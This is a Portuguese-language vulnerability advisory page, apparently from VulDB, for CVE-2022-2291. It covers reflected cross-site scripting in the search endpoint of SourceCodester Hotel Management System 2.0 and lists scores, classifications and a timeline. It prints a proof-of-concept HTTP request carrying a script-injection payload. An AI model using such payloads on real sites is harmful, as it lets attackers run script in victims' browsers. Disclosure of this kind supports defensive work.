SourceCodester Hotel Management System 2.0 Search /ci_hms/search Roteiro Cruzado de Sítios
CVSS Meta Temp score | Preço de exploração actual (≈) | Nota de Interesse CTI |
---|---|---|
4.5 | $0-$5k | 0.04 |
Uma vulnerabilidade classificada como problemático foi encontrada em SourceCodester Hotel Management System 2.0. Afectado é uma função desconhecida do ficheiro /ci_hms/search do componente Search. A manipulação do argumento search com uma entrada desconhecida leva a Roteiro Cruzado de Sítios. A definição de CWE para a vulnerabilidade é CWE-79. O aconselhamento é partilhado para download em github.com.
A vulnerabilidade é identificada como CVE-2022-2291. O ataque pode ser levado a cabo através da rede. Os detalhes técnicos estão disponíveis. A vulnerabilidade não é bem conhecida. Além disso, há uma exploração disponível. A exploração foi divulgada ao público e pode ser utilizada. O projecto MITRE ATT&CK utiliza a técnica de ataque T1059.007 para esta edição. O seguinte código é a razão para esta vulnerabilidade:
POST /ci_hms/search HTTP/1.1 Host: localhost Content-Length: 11 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost/ci_hms/ Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: ci_session=9kn2p06ccqlaaf2fft0qpgso3qdgj7j1 Connection: closecustomer="><script>alert("XSS")</script>
É declarado como proof-of-concept. A exploração está disponível em github.com. Esperamos que o dia 0 tenha valido aproximadamente $0-$5k.
Produto
Tipo
Fabricante
Nome
Versão
Licença
CPE 2.3
CPE 2.2
CVSSv4
VulDB CVSS-B Score: 🔍VulDB CVSS-BT Score: 🔍
VulDB Vector: 🔍
VulDB Fiabilidade: 🔍
CVSSv3
VulDB Meta Pontuação Base: 4.7VulDB Meta Temp score: 4.5
VulDB Pontuação Base: 4.3
VulDB Pontuação da Tempestade: 3.9
VulDB Vector: 🔍
VulDB Fiabilidade: 🔍
NVD Pontuação Base: 5.4
NVD Vector: 🔍
CNA Pontuação Base: 4.3
CNA Vector (VulDB): 🔍
CVSSv2
AV | AC | Au | C | I | A |
---|---|---|---|---|---|
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
Vector | Complexidade | Autenticação | Confidencialidade | Integridade | Disponibilidade |
---|---|---|---|---|---|
Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
VulDB Pontuação Base: 🔍
VulDB Pontuação da Tempestade: 🔍
VulDB Fiabilidade: 🔍
NVD Pontuação Base: 🔍
Exploração
Classe: Roteiro Cruzado de SítiosCWE: CWE-79 / CWE-74 / CWE-707
CAPEC: 🔍
ATT&CK: 🔍
Local: Não
Remoto: Sim
Disponibilidade: 🔍
Aceda a: Público
Estado: Proof-of-Concept
Descarregar: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Tendência dos preços: 🔍
Estimativa de preço actual: 🔍
0-Day | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
---|---|---|---|---|
Hoje | Desbloquear | Desbloquear | Desbloquear | Desbloquear |
Inteligência de Ameaças
Interesse: 🔍Actores Activos: 🔍
Grupos APT activos: 🔍
Contra-medidas
Recomendação: nenhuma medida conhecidaEstado: 🔍
Tempo 0-Dia: 🔍
Linha do tempo
03/07/2022 🔍03/07/2022 🔍
03/07/2022 🔍
18/07/2022 🔍
Fontes
Aconselhamento: github.comEstado: Não definido
CVE: CVE-2022-2291 (🔍)
scip Labs: https://www.scip.ch/en/?labs.20161013
Entrada
Criado em: 03/07/2022 11h59Actualizado em: 18/07/2022 13h42
Ajustamentos: 03/07/2022 11h59 (42), 03/07/2022 12h01 (3), 18/07/2022 13h37 (2), 18/07/2022 13h42 (28)
Completo: 🔍
Submeter: cyberthoth
Cache ID: 3:940:103
Submit
Aceite
- Submit #40493: Hotel Management System 2.0 Reflected Cross-Site Scripting (a partir de cyberthoth)
Ainda sem comentários. Idiomas: pt + en.
Por favor inicie sessão para comentar.